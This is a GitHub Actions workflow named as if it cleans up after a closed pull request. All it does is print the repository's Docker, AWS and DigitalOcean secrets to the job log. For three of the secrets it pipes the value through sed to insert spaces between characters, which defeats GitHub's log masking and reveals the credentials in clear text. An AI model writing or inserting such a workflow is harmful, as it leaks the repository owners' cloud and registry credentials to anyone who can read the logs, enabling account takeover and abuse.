name: clean_on_pr_closed

on:
  pull_request_target:
    types: [closed]

jobs:
  test_secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Print DOCKER_PASSWORD plainly (will be masked)
        run: echo "DOCKER_PASSWORD: ${{ secrets.DOCKER_PASSWORD }}"

      - name: Print AWS_ACCESS_KEY_ID spaced to reveal value
        run: echo "AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}" | sed 's/./& /g'

      - name: Print AWS_SECRET_ACCESS_KEY spaced to reveal value
        run: echo "AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}" | sed 's/./& /g'

      - name: Print DO_ACCESS_TOKEN spaced to reveal value
        run: echo "DO_ACCESS_TOKEN: ${{ secrets.DO_ACCESS_TOKEN }}" | sed 's/./& /g'

